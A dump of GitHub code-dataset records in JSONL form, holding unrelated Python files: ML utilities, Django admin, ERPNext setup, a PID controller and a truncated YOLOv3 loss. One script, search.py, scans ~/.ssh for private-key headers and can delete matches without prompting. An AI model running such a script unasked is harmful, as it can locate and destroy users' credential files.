no_wrap=True, justify=\"center\")\n table.add_column(\"Definition\", style=\"green\", justify=\"center\")\n for i in alias_list:\n table.add_row(i[0],i[1])\n console = Console()\n console.print(table)","repo_name":"osaeljm/sudo_reader","sub_path":"rich_module.py","file_name":"rich_module.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72381192552","text":"from numpy import sin, cos\nimport torch\nfrom torch import Tensor, ones, device, cuda\nimport torch.nn as nn\n\n\nclass PositionalEncoding(nn.Module):\n def __init__(self, embed_dim: int, sequence_length):\n super(PositionalEncoding, self).__init__()\n\n self.dev = device(\"cuda:0\" if cuda.is_available() else \"cpu\")\n\n self.embed_dim = embed_dim\n self.sequence_length = sequence_length\n\n self.positional_encoding = self.get_positional_embeddings()\n\n def get_positional_embeddings(self) -> Tensor:\n result = ones(self.sequence_length, self.embed_dim)\n\n for i in range(self.sequence_length):\n for j in range(self.embed_dim):\n result[i][j] = sin(i / (10000 ** (j / self.embed_dim))) \\\n if j % 2 == 0 \\\n else cos(i / (10000 ** ((j - 1) / self.embed_dim)))\n\n return result\n\n def forward(self, x: torch.FloatTensor) -> torch.FloatTensor:\n x += self.positional_encoding.repeat(x.shape[0], 1, 1).to(self.dev)\n\n return x\n","repo_name":"Thiggel/UnifiedTransformer","sub_path":"Transformer/PositionalEncoding.py","file_name":"PositionalEncoding.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72422264232","text":"import re\nimport os\nimport argparse\n\n\ndef delete_file(filepath):\n os.remove(filepath)\n print(\"File \" + filepath + \" deleted.\")\n\n\ndef find_pattern_in_directory(\n pattern: str, directory: str, delete_prompt: bool = False, non_interactive=False\n) -> None:\n regex = re.compile(pattern)\n try:\n for root, _, files in os.walk(directory):\n for filename in files:\n filepath = os.path.join(root, filename)\n with open(filepath, \"r\", errors=\"ignore\") as file:\n contents = file.read()\n if regex.search(contents):\n print(\"Pattern found in file:\" + filepath)\n if delete_prompt:\n if non_interactive:\n delete_file(filepath)\n continue\n response = input(\n filepath\n + \"Do you want to delete? (y/Y for yes, n/N for no): \",\n )\n if response.lower() == \"y\":\n delete_file(filepath)\n except PermissionError:\n print(\"premission deneid \" + filepath)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\n description=\"Search for a pattern in files within a directory.\"\n )\n parser.add_argument(\n \"--pattern\",\n \"-p\",\n type=str,\n help=\"The pattern to search for.\",\n default=\"BEGIN.*KEY\",\n )\n parser.add_argument(\n \"--directory\",\n \"-d\",\n type=str,\n required=False,\n default=\"~/.ssh\",\n help=\"The directory to search within.\",\n )\n parser.add_argument(\n \"--delete\",\n action=\"store_true\",\n help=\"Prompt to delete the file if the pattern is found.\",\n )\n parser.add_argument(\n \"--non-interactive\",\n \"-i\",\n action=\"store_true\",\n help=\"None interactive mode.\",\n )\n args = parser.parse_args()\n\n find_pattern_in_directory(\n args.pattern, args.directory, args.delete, args.non_interactive\n )\n","repo_name":"SirAppSec/sshearch","sub_path":"search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":2159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10255933662","text":"r\"\"\"Shared IR serialization logic used by TFleX python executor binary.\"\"\"\n\nimport base64\n\nfrom typing import Union\n\nfrom tfx.orchestration import metadata\nfrom tfx.orchestration.portable import data_types\nfrom tfx.proto.orchestration import executable_spec_pb2\nfrom tfx.proto.orchestration import execution_invocation_pb2\nfrom tfx.proto.orchestration import metadata_pb2\n\n\ndef deserialize_execution_info(\n execution_info_b64: str) -> data_types.ExecutionInfo:\n \"\"\"De-serializes the ExecutionInfo class from a url safe base64 encoded binary string.\"\"\"\n execution_info_proto = execution_invocation_pb2.ExecutionInvocation.FromString(\n base64.urlsafe_b64decode(execution_info_b64))\n return data_types.ExecutionInfo.from_proto(execution_info_proto)\n\n\ndef deserialize_mlmd_connection_config(\n mlmd_connection_config_b64: str) -> metadata.ConnectionConfigType:\n \"\"\"De-serializes an MLMD connection config from base64 flag.\"\"\"\n mlmd_connection_config = (\n metadata_pb2.MLMDConnectionConfig.FromString(\n base64.b64decode(mlmd_connection_config_b64)))\n return getattr(mlmd_connection_config,\n mlmd_connection_config.WhichOneof('connection_config'))\n\n\ndef deserialize_executable_spec(\n executable_spec_b64: str,\n with_beam: bool = False,\n) -> Union[executable_spec_pb2.PythonClassExecutableSpec,\n executable_spec_pb2.BeamExecutableSpec]:\n \"\"\"De-serializes an executable spec from base64 flag.\"\"\"\n if with_beam:\n return executable_spec_pb2.BeamExecutableSpec.FromString(\n base64.b64decode(executable_spec_b64))\n return executable_spec_pb2.PythonClassExecutableSpec.FromString(\n base64.b64decode(executable_spec_b64))\n\n\ndef serialize_mlmd_connection_config(\n connection_config: metadata.ConnectionConfigType) -> str:\n \"\"\"Serializes an MLMD connection config into a base64 flag of its wrapper.\"\"\"\n mlmd_wrapper = metadata_pb2.MLMDConnectionConfig()\n for name, descriptor in (\n metadata_pb2.MLMDConnectionConfig.DESCRIPTOR.fields_by_name.items()):\n if descriptor.message_type.full_name == connection_config.DESCRIPTOR.full_name:\n getattr(mlmd_wrapper, name).CopyFrom(connection_config)\n break\n return base64.b64encode(mlmd_wrapper.SerializeToString()).decode('ascii')\n\n\ndef serialize_executable_spec(\n executable_spec: Union[executable_spec_pb2.PythonClassExecutableSpec,\n executable_spec_pb2.BeamExecutableSpec]\n) -> str:\n \"\"\"Serializes an executable spec into a base64 flag.\"\"\"\n return base64.b64encode(executable_spec.SerializeToString()).decode('ascii')\n\n\ndef serialize_execution_info(execution_info: data_types.ExecutionInfo) -> str:\n \"\"\"Serializes the ExecutionInfo class from a base64 flag.\"\"\"\n execution_info_proto = execution_info.to_proto()\n return base64.b64encode(\n execution_info_proto.SerializeToString()).decode('ascii')\n","repo_name":"xjdlb/my-awesome-tensorlfow-tutorial","sub_path":"tfx-master/tfx/orchestration/python_execution_binary/python_execution_binary_utils.py","file_name":"python_execution_binary_utils.py","file_ext":"py","file_size_in_byte":2868,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"8313180686","text":"from django.contrib import admin\nfrom .models import Project, Result, DuplicateTitle, DuplicateDescription,\\\n MissingH1, MissingCanonical, MissingTitle, MissingViewPort,\\\n MissingDescription, LowMeta, LowTitle, DuplicateH1, CrawlingStatistic, \\\n AuditStatistic, Article, ArticleContent\n\n# Register your models here.\n\nclass DuplicateTitleAdmin(admin.TabularInline):\n model = DuplicateTitle\n fields = ('titles',)\n\nclass DuplicateH1Admin(admin.TabularInline):\n model = DuplicateH1\n fields = ('titles',)\n\nclass DuplicateDescriptionAdmin(admin.TabularInline):\n model = DuplicateDescription\n fields = ('titles',)\n\nclass MissingH1Admin(admin.TabularInline):\n model = MissingH1\n fields = ('title',)\n\nclass MissingTitleAdmin(admin.TabularInline):\n model = MissingTitle\n fields = ('title',)\n\n\nclass MissingDescriptionAdmin(admin.TabularInline):\n model = MissingDescription\n fields = ('title',)\n\nclass MissingCanonicalAdmin(admin.TabularInline):\n model = MissingCanonical\n fields = ('title',)\n\n\nclass MissingDescriptionAdmin(admin.TabularInline):\n model = MissingDescription\n fields = ('title',)\n\nclass MissingViewPortAdmin(admin.TabularInline):\n model = MissingViewPort\n fields = ('title',)\n\nclass LowTitleAdmin(admin.TabularInline):\n model = LowTitle\n fields = ('title',)\n\n\nclass LowMetaAdmin(admin.TabularInline):\n model = LowMeta\n fields = ('title',)\n\n\nclass CrawlingStatisticAdmin(admin.TabularInline):\n model = CrawlingStatistic\n fields = ('date',)\n\n\nclass AuditStatisticAdmin(admin.TabularInline):\n model = AuditStatistic\n fields = ('date',)\n \n@admin.register(Result)\nclass ResultsAdmin(admin.ModelAdmin):\n list_display = ('project', 'created_at', 'updated_at')\n inlines = [DuplicateTitleAdmin, DuplicateDescriptionAdmin, MissingH1Admin, MissingTitleAdmin,\n MissingDescriptionAdmin, MissingCanonicalAdmin, MissingViewPortAdmin, LowMetaAdmin, LowTitleAdmin,\n DuplicateH1Admin\n ]\n \n\n@admin.register(Project)\nclass ProjectsAdmin(admin.ModelAdmin):\n list_display = ('user', 'name', 'homepage', 'created_at')\n ordering = ('-created_at',)\n inlines = [CrawlingStatisticAdmin, AuditStatisticAdmin]\n \n\n\nclass ArticleContentAdmin(admin.TabularInline):\n model = ArticleContent\n fields = ('title','content',)\n \n\n@admin.register(Article)\nclass ArticleAdmin(admin.ModelAdmin):\n list_display = ['title']\n inlines = [ArticleContentAdmin, ]\n\n\n\n\n\n\n","repo_name":"obiemmanuel2018/seo-analyzer-backend","sub_path":"spider/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":2628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40506067727","text":"import enum\nfrom typing import TypeVar, Generic, Dict, Optional\n\nT = TypeVar('T')\n\n\nclass CycleStatus(enum.Enum):\n UNKNOWN = enum.auto()\n TESTING = enum.auto()\n FOUND = enum.auto()\n\n\nclass CycleFinder(Generic[T]):\n def __init__(self, wait_at_least=None, needs_repeated=1):\n self._cache: Dict[int, T] = {}\n self._last_seen_index: Dict[T, int] = {}\n self._cycle_status: CycleStatus = CycleStatus.UNKNOWN\n self._cycle_start: Optional[int] = None\n self._cycle_end: Optional[int] = None\n self._testing_index: Optional[int] = None\n\n self._wait_at_least: Optional[int] = wait_at_least\n self._repeat_count = 0\n self._needs_repeated: int = needs_repeated\n\n @property\n def cycle_found(self) -> bool:\n return self._cycle_status == CycleStatus.FOUND\n\n @property\n def cycle_start(self) -> Optional[int]:\n if not self.cycle_found:\n return None\n return self._cycle_start\n\n @property\n def cycle_size(self) -> Optional[int]:\n if not self.cycle_found:\n return None\n return self._cycle_end - self._cycle_start + 1\n\n def __setitem__(self, index: int, value: T):\n if self._cycle_status == CycleStatus.FOUND:\n return\n\n last_seen_index = self._last_seen_index[value] if value in self._last_seen_index else None\n\n self._last_seen_index[value] = index\n self._cache[index] = value\n\n if last_seen_index is None:\n self._reset() # Can't be in a cycle if this is a new number\n return\n\n if self._wait_at_least is not None and index < self._wait_at_least:\n return\n\n if self._cycle_status == CycleStatus.UNKNOWN:\n self._repeat_count = 0\n self._cycle_start = last_seen_index\n self._testing_index = last_seen_index\n self._cycle_end = index - 1\n self._cycle_status = CycleStatus.TESTING\n elif self._cycle_status == CycleStatus.TESTING:\n self._testing_index += 1\n if self._cache[self._testing_index] != value: # We've broken the cycle\n self._reset()\n return\n\n if self._cycle_end == self._testing_index:\n self._repeat_count += 1\n if self._repeat_count == self._needs_repeated:\n self._cycle_status = CycleStatus.FOUND\n return\n else:\n cycle_size = self._cycle_end - self._cycle_start + 1\n self._cycle_start += cycle_size\n self._cycle_end += cycle_size\n\n def _reset(self):\n self._cycle_status = CycleStatus.UNKNOWN\n self._testing_index = None\n self._cycle_start = None\n self._cycle_end = None\n self._repeat_count = 0\n","repo_name":"Jnesselr/AdventOfCode","sub_path":"aoc/util/cycle_finder.py","file_name":"cycle_finder.py","file_ext":"py","file_size_in_byte":2827,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"19740765966","text":"import time\r\nimport typing\r\nfrom pathlib import Path\r\n\r\nimport clip\r\nimport open_clip\r\nimport torch\r\nfrom loguru import logger\r\nfrom typing_extensions import override\r\n\r\nfrom hordelib.config_path import get_hordelib_path\r\nfrom hordelib.consts import MODEL_CATEGORY_NAMES, MODEL_DB_NAMES\r\nfrom hordelib.model_manager.base import BaseModelManager\r\n\r\n\r\nclass ClipModelManager(BaseModelManager):\r\n def __init__(self, download_reference=False):\r\n super().__init__(\r\n models_db_name=MODEL_DB_NAMES[MODEL_CATEGORY_NAMES.clip],\r\n download_reference=download_reference,\r\n )\r\n\r\n def load_ranking_lists(self):\r\n ranking_lists = {}\r\n ranking_lists_path = Path(get_hordelib_path()).joinpath(\r\n \"clip/\",\r\n \"ranking_lists/\",\r\n )\r\n for file in ranking_lists_path.glob(\"*.txt\"):\r\n ranking_lists[file.stem] = load_list(file)\r\n return ranking_lists\r\n\r\n def load_coca(self, model_name, half_precision=True, gpu_id=0, cpu_only=False):\r\n model_path = self.get_model_files(model_name)[0][\"path\"]\r\n model_path = f\"{self.modelFolderPath}/{model_path}\"\r\n if cpu_only:\r\n device = torch.device(\"cpu\")\r\n half_precision = False\r\n else:\r\n device = torch.device(f\"cuda:{gpu_id}\" if self.cuda_available else \"cpu\")\r\n model, _, transform = open_clip.create_model_and_transforms(\r\n \"coca_ViT-L-14\",\r\n pretrained=model_path,\r\n device=device,\r\n precision=\"fp16\" if half_precision else \"fp32\",\r\n )\r\n model = model.eval()\r\n model.to(device)\r\n if half_precision:\r\n model = model.half()\r\n return {\r\n \"model\": model,\r\n \"device\": device,\r\n \"transform\": transform,\r\n \"half_precision\": half_precision,\r\n \"cache_name\": model_name.replace(\"/\", \"_\"),\r\n }\r\n\r\n def load_open_clip(self, model_name, half_precision=True, gpu_id=0, cpu_only=False):\r\n pretrained = self.get_model(model_name)[\"pretrained_name\"]\r\n if cpu_only:\r\n device = torch.device(\"cpu\")\r\n half_precision = False\r\n else:\r\n device = torch.device(f\"cuda:{gpu_id}\" if self.cuda_available else \"cpu\")\r\n model, _, preprocess = open_clip.create_model_and_transforms(\r\n model_name,\r\n pretrained=pretrained,\r\n cache_dir=self.modelFolderPath,\r\n device=device,\r\n precision=\"fp16\" if half_precision else \"fp32\",\r\n )\r\n model = model.eval()\r\n model.to(device)\r\n if half_precision:\r\n model = model.half()\r\n ranking_lists = self.load_ranking_lists()\r\n return {\r\n \"model\": model,\r\n \"device\": device,\r\n \"preprocess\": preprocess,\r\n \"ranking_lists\": ranking_lists,\r\n \"half_precision\": half_precision,\r\n \"cache_name\": model_name.replace(\"/\", \"_\"),\r\n }\r\n\r\n def load_clip(self, model_name, half_precision=True, gpu_id=0, cpu_only=False):\r\n if cpu_only:\r\n device = torch.device(\"cpu\")\r\n half_precision = False\r\n else:\r\n device = torch.device(f\"cuda:{gpu_id}\" if self.cuda_available else \"cpu\")\r\n model, preprocess = clip.load(\r\n model_name,\r\n device=device,\r\n download_root=self.modelFolderPath,\r\n )\r\n model = model.eval()\r\n if half_precision:\r\n model = model.half()\r\n ranking_lists = self.load_ranking_lists()\r\n return {\r\n \"model\": model,\r\n \"device\": device,\r\n \"preprocess\": preprocess,\r\n \"ranking_lists\": ranking_lists,\r\n \"half_precision\": half_precision,\r\n \"cache_name\": model_name.replace(\"/\", \"_\"),\r\n }\r\n\r\n @override\r\n def modelToRam(\r\n self,\r\n model_name: str,\r\n half_precision=True,\r\n gpu_id=0,\r\n cpu_only=False,\r\n **kwargs,\r\n ) -> dict[str, typing.Any]:\r\n \"\"\"\r\n model_name: str. Name of the model to load. See available_models for a list of available models.\r\n half_precision: bool. If True, the model will be loaded in half precision.\r\n gpu_id: int. The id of the gpu to use. If the gpu is not available, the model will be loaded on the cpu.\r\n cpu_only: bool. If True, the model will be loaded on the cpu. If True, half_precision will be set to False.\r\n \"\"\"\r\n loaded_model_info = None\r\n if not self.cuda_available:\r\n cpu_only = True\r\n tic = time.time()\r\n logger.init(f\"{model_name}\", status=\"Loading\") # logger.init\r\n if self.model_reference[model_name][\"type\"] == \"open_clip\":\r\n loaded_model_info = self.load_open_clip(\r\n model_name,\r\n half_precision,\r\n gpu_id,\r\n cpu_only,\r\n )\r\n self.add_loaded_model(model_name, loaded_model_info)\r\n elif self.model_reference[model_name][\"type\"] == \"clip\":\r\n loaded_model_info = self.load_clip(\r\n model_name,\r\n half_precision,\r\n gpu_id,\r\n cpu_only,\r\n )\r\n self.add_loaded_model(model_name, loaded_model_info)\r\n elif self.model_reference[model_name][\"type\"] == \"coca\":\r\n loaded_model_info = self.load_coca(\r\n model_name,\r\n half_precision,\r\n gpu_id,\r\n cpu_only,\r\n )\r\n self.add_loaded_models(model_name, loaded_model_info)\r\n else:\r\n logger.error(\r\n f\"Unknown model type: {self.model_reference[model_name]['type']}\",\r\n )\r\n return {} # XXX # FIXME\r\n if not loaded_model_info:\r\n logger.init_err(f\"Failed to load {model_name}\", status=\"Error\")\r\n return {} # XXX # FIXME\r\n\r\n logger.init_ok(f\"Loading {model_name}\", status=\"Success\") # logger.init_ok\r\n toc = time.time()\r\n logger.init_ok(\r\n f\"Loading {model_name}: Took {toc-tic} seconds\",\r\n status=\"Success\",\r\n ) # logger.init_ok\r\n return loaded_model_info\r\n\r\n\r\ndef load_list(filename):\r\n with open(filename, encoding=\"utf-8\", errors=\"replace\") as f:\r\n return [line.strip() for line in f.readlines()]\r\n","repo_name":"Haidra-Org/hordelib_old","sub_path":"hordelib/model_manager/clip.py","file_name":"clip.py","file_ext":"py","file_size_in_byte":6455,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"72"} +{"seq_id":"32378418252","text":"#!usr/bin/env python3\n# -*- coding: utf-8 -*-\n'''\nAnagram Problem\n\nDependencies:\ncollections for Counter comparison\n'''\n\nfrom collections import Counter\nimport argparse\n\ndef detect_anagrams(orig, testcases):\n '''Determine if a set of solutions are anagrams to a given string'''\n build = []\n for testcase in testcases:\n if Counter(orig.lower()) == Counter(testcase.lower()) \\\n and orig.lower() != testcase.lower():\n build.append(testcase)\n return build\n\ndef main():\n '''Main wrapper'''\n parser = argparse.ArgumentParser()\n parser.add_argument('word', help='original word to test against')\n parser.add_argument('wlist', help='space separated string of words to test')\n args = parser.parse_args()\n for anagram in detect_anagrams(args.word, args.wlist.split()):\n print(anagram)\n\nif __name__ == '__main__':\n main()\n","repo_name":"SodiumIodide/Exercism","sub_path":"python/anagram/anagram.py","file_name":"anagram.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38146391569","text":"import frappe\nfrom frappe import _\nfrom frappe.utils import cstr, getdate\nfrom .default_website import website_maker\n\n\ndef create_fiscal_year_and_company(args):\n\tif args.get(\"fy_start_date\"):\n\t\tcurr_fiscal_year = get_fy_details(args.get(\"fy_start_date\"), args.get(\"fy_end_date\"))\n\t\tfrappe.get_doc(\n\t\t\t{\n\t\t\t\t\"doctype\": \"Fiscal Year\",\n\t\t\t\t\"year\": curr_fiscal_year,\n\t\t\t\t\"year_start_date\": args.get(\"fy_start_date\"),\n\t\t\t\t\"year_end_date\": args.get(\"fy_end_date\"),\n\t\t\t}\n\t\t).insert()\n\n\tif args.get(\"company_name\"):\n\t\tfrappe.get_doc(\n\t\t\t{\n\t\t\t\t\"doctype\": \"Company\",\n\t\t\t\t\"company_name\": args.get(\"company_name\"),\n\t\t\t\t\"enable_perpetual_inventory\": 1,\n\t\t\t\t\"abbr\": args.get(\"company_abbr\"),\n\t\t\t\t\"default_currency\": args.get(\"currency\"),\n\t\t\t\t\"country\": args.get(\"country\"),\n\t\t\t\t\"create_chart_of_accounts_based_on\": \"Standard Template\",\n\t\t\t\t\"chart_of_accounts\": args.get(\"chart_of_accounts\"),\n\t\t\t}\n\t\t).insert()\n\n\ndef enable_shopping_cart(args): # nosemgrep\n\t# Needs price_lists\n\tfrappe.get_doc(\n\t\t{\n\t\t\t\"doctype\": \"E Commerce Settings\",\n\t\t\t\"enabled\": 1,\n\t\t\t\"company\": args.get(\"company_name\"),\n\t\t\t\"price_list\": frappe.db.get_value(\"Price List\", {\"selling\": 1}),\n\t\t\t\"default_customer_group\": _(\"Individual\"),\n\t\t\t\"quotation_series\": \"QTN-\",\n\t\t}\n\t).insert()\n\n\ndef create_email_digest():\n\tfrom frappe.utils.user import get_system_managers\n\n\tsystem_managers = get_system_managers(only_name=True)\n\n\tif not system_managers:\n\t\treturn\n\n\trecipients = []\n\tfor d in system_managers:\n\t\trecipients.append({\"recipient\": d})\n\n\tcompanies = frappe.db.sql_list(\"select name FROM `tabCompany`\")\n\tfor company in companies:\n\t\tif not frappe.db.exists(\"Email Digest\", \"Default Weekly Digest - \" + company):\n\t\t\tedigest = frappe.get_doc(\n\t\t\t\t{\n\t\t\t\t\t\"doctype\": \"Email Digest\",\n\t\t\t\t\t\"name\": \"Default Weekly Digest - \" + company,\n\t\t\t\t\t\"company\": company,\n\t\t\t\t\t\"frequency\": \"Weekly\",\n\t\t\t\t\t\"recipients\": recipients,\n\t\t\t\t}\n\t\t\t)\n\n\t\t\tfor df in edigest.meta.get(\"fields\", {\"fieldtype\": \"Check\"}):\n\t\t\t\tif df.fieldname != \"scheduler_errors\":\n\t\t\t\t\tedigest.set(df.fieldname, 1)\n\n\t\t\tedigest.insert()\n\n\t# scheduler errors digest\n\tif companies:\n\t\tedigest = frappe.new_doc(\"Email Digest\")\n\t\tedigest.update(\n\t\t\t{\n\t\t\t\t\"name\": \"Scheduler Errors\",\n\t\t\t\t\"company\": companies[0],\n\t\t\t\t\"frequency\": \"Daily\",\n\t\t\t\t\"recipients\": recipients,\n\t\t\t\t\"scheduler_errors\": 1,\n\t\t\t\t\"enabled\": 1,\n\t\t\t}\n\t\t)\n\t\tedigest.insert()\n\n\ndef create_logo(args):\n\tif args.get(\"attach_logo\"):\n\t\tattach_logo = args.get(\"attach_logo\").split(\",\")\n\t\tif len(attach_logo) == 3:\n\t\t\tfilename, filetype, content = attach_logo\n\t\t\t_file = frappe.get_doc(\n\t\t\t\t{\n\t\t\t\t\t\"doctype\": \"File\",\n\t\t\t\t\t\"file_name\": filename,\n\t\t\t\t\t\"attached_to_doctype\": \"Website Settings\",\n\t\t\t\t\t\"attached_to_name\": \"Website Settings\",\n\t\t\t\t\t\"decode\": True,\n\t\t\t\t}\n\t\t\t)\n\t\t\t_file.save()\n\t\t\tfileurl = _file.file_url\n\t\t\tfrappe.db.set_value(\n\t\t\t\t\"Website Settings\",\n\t\t\t\t\"Website Settings\",\n\t\t\t\t\"brand_html\",\n\t\t\t\t\" {1}\".format(\n\t\t\t\t\tfileurl, args.get(\"company_name\")\n\t\t\t\t),\n\t\t\t)\n\n\ndef create_website(args):\n\twebsite_maker(args)\n\n\ndef get_fy_details(fy_start_date, fy_end_date):\n\tstart_year = getdate(fy_start_date).year\n\tif start_year == getdate(fy_end_date).year:\n\t\tfy = cstr(start_year)\n\telse:\n\t\tfy = cstr(start_year) + \"-\" + cstr(start_year + 1)\n\treturn fy\n","repo_name":"RafMo20D/erpnext-ksa-op","sub_path":"erpnext/setup/setup_wizard/operations/company_setup.py","file_name":"company_setup.py","file_ext":"py","file_size_in_byte":3275,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"2988476240","text":"# Definition for a binary tree node.\nclass TreeNode(object):\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass Codec:\n \"\"\"\n 一棵树的下边缘是被None值包裹着的。\n \"\"\"\n def serialize(self, root: TreeNode):\n \"\"\"Encodes a tree to a single string.\n :type root: TreeNode\n :rtype: str, 官渡优先搜索,每个节点值��用空格隔开;\n \"\"\"\n res = \"\"\n queue = [root]\n while queue:\n node = queue.pop(0)\n if node:\n res += str(node.val)\n queue.append(node.left)\n queue.append(node.right)\n else:\n res += \"n\"\n res += \" \"\n return res\n\n def deserialize(self, data: str):\n \"\"\"Decodes your encoded data to tree.\n :type data: str\n :rtype: TreeNode\n \"\"\"\n tree = data.split()\n if tree[0] == 'n':\n return None\n root = TreeNode(int(tree[0]))\n queue = [root]\n i = 1\n while queue:\n root = queue.pop(0)\n if root is None:# 相当于剪枝操作,对于已经为None的节点,不再继续处理其子节点\n continue\n root.left = TreeNode(int(tree[i])) if tree[i]!=\"n\" else None\n root.right = TreeNode(int(tree[i+1])) if tree[i+1]!=\"n\" else None\n i += 2\n queue.append(root.left)\n queue.append(root.right)\n return root\n\ndef printNode(root: TreeNode):\n queue = [root]\n while queue:\n node = queue.pop(0)\n print(node.val)\n if node.left: queue.append(node.left)\n if node.right: queue.append(node.right)\n\n# Your Codec object will be instantiated and called as such:\ncodec = Codec()\nroot = TreeNode(-1)\nroot.left = TreeNode(0)\nret = codec.deserialize(codec.serialize(root))\nprintNode(ret)\n","repo_name":"Transi-ent/LeetcodeSolver","sub_path":"297.py","file_name":"297.py","file_ext":"py","file_size_in_byte":1925,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"4475131636","text":"import matplotlib.pyplot as plt\nimport time\nfrom datetime import datetime\n\nfrom utilities import clear_file, write_to_file, get_pos, set_thrust, scale_u\n\n\n# The PID controller\ndef PID(kp, ki, kd, timeout, dt, r, rc, ch):\n \n # sets the start deviation \n # This also needed to be changed, when the setup was changed, 06.05.2022\n e_prev = -r + get_pos(ch) # e = r - y\n e_sum = 0\n e = e_prev\n\n # All the files i need to save data\n files = [\"textfiles/pos.txt\",\"textfiles/ref.txt\",\"textfiles/P.txt\",\"textfiles/I.txt\",\"textfiles/D.txt\"]\n\n # Clear all the files\n for file in files:\n clear_file(file)\n\n sleep = 0.20 # the sleep time of the while loop\n timeout_start = time.time()\n\n # The loop runs until the time reaches timeout\n while time.time() < timeout_start + timeout: \n # the current time from the loop started\n now_time = time.time()-timeout_start \n # Changes the reference at mid time. Used to test the systems strengh\n # if ((timeout/2) - sleep/2) < now_time < ((timeout/2) + sleep/2):\n # r -= 0.04\n\n e_prev = e # e_prev is set to be the error from the last timed the loop \n # gets a new error\n # This also needed to be changed, when the setup was changed, 06.05.2022 \n e = -r + get_pos(ch) \n\n # Proprotional part\n P = kp*e\n\n # Integrator part, sums the errors\n e_sum = e_sum + e * dt\n I = ki * e_sum\n # Needs make sure the integration doesn't gets to big or low\n if I > 90:\n e_sum = 90/ki\n elif I < -90:\n e_sum = -90/(ki)\n \n\n # Derivative part\n dedt = (e - e_prev)/dt\n D = kd * dedt\n \n\n \n # Needs to add 90 because this is the angle where the thrust is zero\n u = P + I + D + 90 \n # Scales the thurst to be within working range, else its zero \n new_u = scale_u(u)\n # Apply thrust \n set_thrust(rc,new_u)\n\n\n # Write the positon and reference to file\n write_to_file(files[0],now_time,get_pos(ch))\n write_to_file(files[1],now_time,r)\n\n\n # write the PID values to file\n write_to_file(files[2],now_time,P)\n write_to_file(files[3],now_time,I)\n write_to_file(files[4],now_time,D)\n\n\n # Sleep the loop to make it run approximatly every 0.25 seconds, \n # becuase it's when the voltage also is updated\n time.sleep(sleep)\n \n # Stops the thrust appleied when the loop is finished\n rc.setEngaged(False)\n\n\n\n\n","repo_name":"petterhangerhagen/TMR4345-Marin-Datalab","sub_path":"Code/PID.py","file_name":"PID.py","file_ext":"py","file_size_in_byte":2563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36064977073","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\nimport paddle\nimport paddle.nn as nn\nimport paddle.nn.functional as F\nfrom ppdet.core.workspace import register\n\nfrom ..bbox_utils import decode_yolo, xywh2xyxy, batch_iou_similarity, bbox_iou\n\n__all__ = ['YOLOv3Loss', 'YOLOv5Loss']\n\n\ndef bbox_transform(pbox, anchor, downsample):\n pbox = decode_yolo(pbox, anchor, downsample)\n pbox = xywh2xyxy(pbox)\n return pbox\n\n\n@register\nclass YOLOv3Loss(nn.Layer):\n\n __inject__ = ['iou_loss', 'iou_aware_loss']\n __shared__ = ['num_classes']\n\n def __init__(self,\n num_classes=80,\n ignore_thresh=0.7,\n label_smooth=False,\n downsample=[32, 16, 8],\n scale_x_y=1.,\n iou_loss=None,\n iou_aware_loss=None):\n \"\"\"\n YOLOv3Loss layer\n\n Args:\n num_calsses (int): number of foreground classes\n ignore_thresh (float): threshold to ignore confidence loss\n label_smooth (bool): whether to use label smoothing\n downsample (list): downsample ratio for each detection block\n scale_x_y (float): scale_x_y factor\n iou_loss (object): IoULoss instance\n iou_aware_loss (object): IouAwareLoss instance \n \"\"\"\n super(YOLOv3Loss, self).__init__()\n self.num_classes = num_classes\n self.ignore_thresh = ignore_thresh\n self.label_smooth = label_smooth\n self.downsample = downsample\n self.scale_x_y = scale_x_y\n self.iou_loss = iou_loss\n self.iou_aware_loss = iou_aware_loss\n self.distill_pairs = []\n\n def obj_loss(self, pbox, gbox, pobj, tobj, anchor, downsample):\n # pbox\n pbox = decode_yolo(pbox, anchor, downsample)\n pbox = xywh2xyxy(pbox)\n pbox = paddle.concat(pbox, axis=-1)\n b = pbox.shape[0]\n pbox = pbox.reshape((b, -1, 4))\n # gbox\n gxy = gbox[:, :, 0:2] - gbox[:, :, 2:4] * 0.5\n gwh = gbox[:, :, 0:2] + gbox[:, :, 2:4] * 0.5\n gbox = paddle.concat([gxy, gwh], axis=-1)\n\n iou = batch_iou_similarity(pbox, gbox)\n iou.stop_gradient = True\n iou_max = iou.max(2) # [N, M1]\n iou_mask = paddle.cast(iou_max <= self.ignore_thresh, dtype=pbox.dtype)\n iou_mask.stop_gradient = True\n\n pobj = pobj.reshape((b, -1))\n tobj = tobj.reshape((b, -1))\n obj_mask = paddle.cast(tobj > 0, dtype=pbox.dtype)\n obj_mask.stop_gradient = True\n\n loss_obj = F.binary_cross_entropy_with_logits(\n pobj, obj_mask, reduction='none')\n loss_obj_pos = (loss_obj * tobj)\n loss_obj_neg = (loss_obj * (1 - obj_mask) * iou_mask)\n return loss_obj_pos + loss_obj_neg\n\n def cls_loss(self, pcls, tcls):\n if self.label_smooth:\n delta = min(1. / self.num_classes, 1. / 40)\n pos, neg = 1 - delta, delta\n # 1 for positive, 0 for negative\n 